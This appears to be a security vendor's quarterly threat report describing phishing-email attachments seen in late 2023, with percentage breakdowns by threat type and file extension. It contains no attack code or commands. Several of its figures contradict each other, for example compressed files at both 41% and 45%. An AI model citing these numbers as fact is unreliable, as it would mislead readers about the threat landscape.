Overview

AhnLab SEcurity intelligence Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the fourth quarter of 2023 (October, November, and December) and provide statistical information on each type. Generally, phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineering methods. On a broader note, the act is a technical subterfuge that enables the threat actor to perform attacks such as information leaks, malware distribution, and online fraud against various targets. The focus of this post will be on the fact that phishing attacks mainly occur through emails. We will also provide a detailed classification of various attack methods that are based on phishing emails. Furthermore, we will make an effort to minimize user damage by introducing new attack types that have never been found before and emails that require users’ caution, along with their keywords. The phishing emails covered in this post will only be those that have attachments. Emails that have malicious links in the body without attachments will be excluded.

Statistics

1) Statistic on Attachment Threat Types

In the fourth quarter of 2023, the most prevalent threat type among phishing email attachments was FakePage (50%). This is the type where threat actors mimic login pages, logos, fonts, and display layouts of advertising pages to create deceptive pages that can lure users into entering their account credentials. Subsequently, the threat actors transmit this information to their C2 server or lead users to fake sites. The second most common threat type was Infostealer (23%), exemplified by malware strains like AgentTesla, FormBook, and AveMaria. These malware strains compromise user information stored in web browsers, emails, FTP clients, and similar applications. The third prevalent threat type was Trojan (13%), with other identified types being Downloader (12%), Exploit (1%), and Backdoor (1%) in that descending order. Compared to the statistics from the third quarter, notable trends include a 12% increase in the proportion of FakePage (50%) and a 9% decrease in the proportion of Trojan (13%). The proportions of Infostealer (23%) and Downloader (12%) showed similar trends to those of the third quarter.

2) Statistic on Attachment Extension Types

In the fourth quarter of 2023, among phishing email attachment extensions, the most common type was compressed files (41%). Upon extraction, these files may contain various malware, including Infostealers and Downloaders. The extensions distributed were 7Z (13%), RAR (8%), and ZIP (4%) in that descending order. The second most common file extension type was web page scripts (39%), representing documents executed in web browsers, such as FakePages. The distributed extensions were HTML (22%), HTM (8%), and SHTML (5%). Additionally, Documents (10%), Images (9%), and Executables (PE, 1%) were identified. Compared to the third quarter statistics, the trends in the fourth quarter show that for the compressed file type (45%), the 7Z extension increased by 9% compared to the third quarter, while the ZIP extension, which had the highest proportion in the third quarter, decreased by 6%. For script (13%) types, compared to the third quarter, there was an 8% increase in the HTML extension and a 9% decrease in the HTM extension. In image files (9%), the distribution of ISO extensions decreased by 5%, resulting in a 1% decrease in quantity relative to the total, while the IMG extension showed a trend of increasing by 3%.